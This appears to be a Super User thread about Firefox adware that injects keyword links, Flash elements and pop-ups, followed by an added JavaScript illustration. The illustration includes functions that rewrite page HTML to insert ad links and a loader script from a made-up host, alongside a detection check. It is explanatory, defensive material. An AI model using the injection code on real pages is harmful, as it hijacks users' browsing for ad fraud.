
For the last few weeks I've had the following happening, using Windows 8.1 and Firefox V44. The only active add-ons are Adblock Plus, Flashblock and Norton Identity Safe:

  • First, Norton Internet Security (which assures me that all is green ticked and hunky dory in security-land) alerts me that there is a large amount of outbound traffic detected. It asks me if I want to run Power Eraser. I did this twice. Power Eraser's total contribution to safety and security is to get its knickers in a twist over the old Office.exe tool (left over from circa Office 2000, which I allowed it to remove) and the Registry setting that allows profiles to be loaded in Powershell. I haven't bothered using it again since.
  • Edit: As an infuriating aside I tried to run a full scan with Norton, but it refused to. I selected Full Scan, selected Go, and nothing happened. Nor could I bring up its options. In the end I ran Norton's diagnostics and found that it recommended reinstalling the thing. Great, it shows me oceans of "All OK Here" green, and it didn't even know that it wasn't running properly.
  • Suddenly Firefox will start alerting me that some obscene number of pop-up windows have been blocked.
  • Some will still sneak through, typically alerting me (complete with details of my network connection) that I "have pop-up windows enabled!" and that I should contact people who will "help" me with this. Others are supposedly site surveys from the site that I'm on which, oddly, all look the same even when relating to completely different web sites.

This seems to be an order of magnitude worse when looking at one particular site: smh.com.au.

I suspect, but am not certain, that the pop-ups that slip through have something to do with this Flash element pointing to //partners.cmptch dot com that has introduced itself onto the page:

[image: Suspect Flash Element]

Throughout the page I find that certain words have become clickable, always "powered by DNS Unlocker", like so:

[image: DNS Unlocker Element]

Frequently, the browser will lock up running scripts pointing to Akamai:

[image: Akamai Script Lockup]

The following is, in detail, the part of my question that is different to the "How can I remove malicious spyware, malware, adware, viruses, trojans or rootkits from my PC?" one.

Here's the ridiculous part. Somebody, somewhere, must know how this thing is doing what it does. But I can't find that information. Every web search yields links on how to "fix" adware. Invariably these turn out to be links to download "The World's Best Anti-Adware Software, Ever!" which will magically fix this for you. On the occasions that there is a so-called "manual" fix it involves removing search engine entries (of which I have no non-standard ones) or the home page (which is still set to the Firefox default) or resetting the browser (which I have already done, setting Firefox back to its factory defaults before adding back the two add-ons mentioned above.)

In desperation I finally succumbed to using an anti-adware tool which was recommended by a number of PC magazines: AdwCleaner v5.032.

This is what it did:

***** [ Files ] *****

[-] File Deleted : C:\WINDOWS\SysWOW64\vers

...
***** [ Registry ] *****

[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\BHO.DLL
[-] Key Deleted : HKLM\SOFTWARE\Classes\.bdcm
[-] Key Deleted : HKLM\SOFTWARE\Classes\.bdcr

And the result of that? Absolutely nothing, as soon as I opened Firefox and went back to the SMH site, the whole business began again.

So in further desperation, I'm now here hoping that someone whose knowledge of servers and browsers and HTML and such is vastly greater than mine can give me some idea of how this is happening, and what I can do to drive a wooden stake through its heart once and for all.

To be completely clear... A link is inserted into the body text of a web page... How? A Flash component is inserted into such a page (assuming that that's what's happening here)... how? A script that may not be part of the real page content is run... how? In short, what is the mechanism by which these infections occur? It's for certain that it isn't just the wastes of protoplasm who spread viruses who know this kind of thing. People who fight those viruses must have put in some effort to understanding the mechanisms, and therefore how to defend against them and defeat them, as well.

Alan K
  • @DavidPostill: No it isn't, because I am also asking HOW these specific symptoms are being generated. I want to understand the enemy, not just kill it. – Alan K Feb 01 '16 at 00:29
  • 1
    Without knowing exactly what has infected you how do you expect the "how does it work" to be answered? – DavidPostill Feb 01 '16 at 00:36
  • @DavidPostill Gee, I dunno David, maybe someone who has made a study of this kind of thing knows more than me. Or you. I've given a pretty detailed description of the symptoms. Strangely enough in medicine some doctors can actually figure stuff out without needing to know the pathogen first. But keep flagging those "potential duplicates", because on this site that's the sort of thing that REALLY matters. – Alan K Feb 01 '16 at 00:43
  • @AlanK: You clarified why this isn't a duplicate in a comment. You might want to add that information to the question because it's in the review queue. Two observations: 1) Don't be surprised if people consider your question too broad and vote to close on that basis. Asking how all these different mechanisms work is a pretty big scope. 2) Assuming the question remains open, snide responses in the comments will discourage answers. Think about deleting your last comment. Just sayin'. – fixer1234 Feb 02 '16 at 02:38
  • @fixer1234: I did edit the question to do that (see the edit history), though the question subject itself does begin more with "how it happens" than "how to fix". I'm not looking for a complete treatise on virus infection but rather on how these specific symptoms are produced. Basically, I'd like someone with the knowledge to shine a light into this particular dark place. If the question is closed... it wouldn't surprise me. Your counsel about the tone of the comment is wise but I know for certain that I'm not the only one on Stack Exchange suffering from "moderator fatigue". (Cont) – Alan K Feb 02 '16 at 09:54
  • @fixer1234: You need only look at the ever-increasing number of articles that can be found by querying the name of the site with a vacuum-related action, and a lot of it comes down to "closed as a potential duplicate". "Closed as it is unclear what was asked", even though someone gave the exact answer needed. "On hold as off topic because gods forbid anyone should express an opinion". I know this is a Meta issue which shouldn't really be in the comments but this place seems to be devolving from a place where people help each other to one which exists for the sole purpose of rule enforcement. – Alan K Feb 02 '16 at 09:56

1 Answer


Your AdwCleaner logs indicate that you had something named BHO.DLL. A quick search for BHO.DLL indicates that BHO.DLL is spyware.

If AdwCleaner could not remove it, I would treat it with the severity of a virus (not plain old adware).

Therefore I would pick an answer from this community wiki. Although I hate to say it, the probable best answer is to restore windows.

adgelbfish
  • Thanks. I can live with that if I have to. But I do want to see whether I can get some insight into the mechanics of how this occurs. Most things you can find by a simple web search but for some reason (possibly the fact that they're buried too deep under the "download this tool" so-called answers) the hows and whys of this kind of infection aren't so easy to find. ADWCleaner removed bho.dll, so it's something else that's causing this. – Alan K Feb 01 '16 at 03:23
  • It could be redirecting your DNS and proxying all of your traffic, or a lot of other things. I would suggest downloading a copy of Firefox Portable, setting it to Google's DNS 8.8.8.8 and 8.8.4.4 with [this extension](https://addons.mozilla.org/en-US/firefox/addon/switchhosts/) and trying again. After that, the next thing I would do is proxy all of your browser's traffic through any proxy server and see if it gets cleared up. Also try setting FF to not use Windows proxy settings in Advanced > Network. – adgelbfish Feb 01 '16 at 04:00
  • @AlanK I'd be curious as to what method they use, if you want, we can continue in chat. – adgelbfish Feb 01 '16 at 04:07
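
The mechanism the question asks about at its end (how a word in body text turns into a link, and how a script the site never shipped ends up running) and the redirect-and-proxy hypothesis in the comment above, as an added JavaScript example. This is not code from the question, the answer, or any product named on this page, and it does not establish which path applied on the asker's machine. The sample article, the hosts example-news.test and ads.injector.test, the keyword list and the URLs are all constructed for the illustration. The first two functions show the rewrite that anything sitting between the server and the rendered page can perform (a proxy that a hijacked DNS answer points a hostname at, a local proxy set in the system proxy settings, or a browser helper object or extension with access to page content): nothing on the origin server changes, the text is simply re-emitted with keywords wrapped in anchors and a loader script appended before `</body>`. The third function is the check: list every host a page references that is not the site's own, which is what the asker did by eye when noticing the partners.cmptch.com Flash element. Run in a browser console, it can be fed `document.documentElement.outerHTML`.

```javascript
// Added illustration only: not code from the question, the answer, or any adware.
// Constructed sample page standing in for a news article (hosts are made up).
const ORIGINAL_HTML = [
  '<html><head><title>Sample article</title>',
  '<script src="https://cdn.example-news.test/app.js"></script></head>',
  '<body><p>The finance minister announced a new savings policy today.</p>',
  '<p>Analysts expect the policy to affect mortgage rates.</p>',
  '<img src="https://static.example-news.test/lead.jpg"></body></html>',
].join('\n');

// Assumed for the demonstration: words an injector sells clicks on, and where
// the injected links and loader point.
const INJECT_KEYWORDS = ['policy', 'mortgage'];
const INJECT_LINK_BASE = 'http://ads.injector.test/click?kw=';
const INJECT_SCRIPT = 'http://ads.injector.test/loader.js';

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Mechanism: split the markup into tags and text, leave tags and the bodies of
// <script>/<style> alone, and wrap keyword occurrences in the remaining text
// with an anchor. A content script walking DOM text nodes does the same thing
// after the page has loaded; a proxy does it to the HTML in transit.
function injectKeywordLinks(html, keywords, linkBase) {
  const keywordRe = new RegExp('\\b(' + keywords.map(escapeRegExp).join('|') + ')\\b', 'gi');
  const tokens = html.split(/(<[^>]+>)/); // capturing group keeps the tags as tokens
  let inRawText = false;                  // true while inside <script> or <style>
  return tokens.map((tok) => {
    if (tok.startsWith('<')) {
      if (/^<(script|style)\b/i.test(tok)) inRawText = true;
      else if (/^<\/(script|style)\s*>/i.test(tok)) inRawText = false;
      return tok;
    }
    if (inRawText || tok.trim() === '') return tok;
    return tok.replace(keywordRe, (word) =>
      `<a href="${linkBase}${encodeURIComponent(word.toLowerCase())}" class="injected-kw">${word}</a>`);
  }).join('');
}

// The same intermediary appends a loader for pop-ups/pop-unders and further ad
// markup; immediately before </body> is the usual spot.
function appendScript(html, src) {
  return html.replace(/<\/body>/i, `<script src="${src}"></script></body>`);
}

// Check: collect the hosts named in href/src attributes and return the ones
// that are neither the site's own nor on an allow-list of expected third parties.
function foreignHosts(html, expectedHosts) {
  const found = new Set();
  const attrRe = /\b(?:href|src)\s*=\s*"([^"]+)"/gi;
  let m;
  while ((m = attrRe.exec(html)) !== null) {
    let url = m[1];
    if (url.startsWith('//')) url = 'http:' + url; // scheme-relative reference
    let host;
    try { host = new URL(url).hostname; } catch (e) { continue; } // relative path, skip
    if (!expectedHosts.some((h) => host === h || host.endsWith('.' + h))) found.add(host);
  }
  return [...found].sort();
}

// Apply the rewrite to the sample page and run the check before and after.
function demo() {
  const rewritten = appendScript(
    injectKeywordLinks(ORIGINAL_HTML, INJECT_KEYWORDS, INJECT_LINK_BASE), INJECT_SCRIPT);
  const expected = ['example-news.test'];
  return {
    rewritten,
    injectedLinkCount: (rewritten.match(/class="injected-kw"/g) || []).length,
    foreignBefore: foreignHosts(ORIGINAL_HTML, expected),
    foreignAfter: foreignHosts(rewritten, expected),
  };
}
```

On the sample page the rewrite produces three injected anchors and one appended script, and `foreignHosts` goes from reporting nothing to reporting ads.injector.test. The check only tells you that a foreign host is present, not where the rewrite happened; the comment's experiment of swapping the resolver, then forcing a known proxy, then disabling the Windows proxy settings in Firefox is what separates a DNS-level redirect from a local proxy or an in-browser component.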